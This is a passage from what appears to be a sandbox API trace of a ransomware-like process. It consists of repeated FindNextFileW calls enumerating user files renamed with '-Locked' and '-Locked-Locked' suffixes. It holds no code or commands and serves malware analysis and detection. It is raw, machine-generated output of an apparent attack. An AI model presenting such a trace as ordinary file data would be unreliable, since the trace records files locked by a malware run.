dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0305.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0305.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0305.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0305.356] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0305.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0305.357] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0305.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0305.358] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0305.359] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0305.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0305.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0305.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0305.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0305.360] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0305.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0305.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0305.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0305.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0305.361] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0305.362] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0305.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0305.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0305.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0305.363] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0305.364] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0305.364] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0305.364] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0305.364] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0305.365] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0305.365] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0305.365] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | 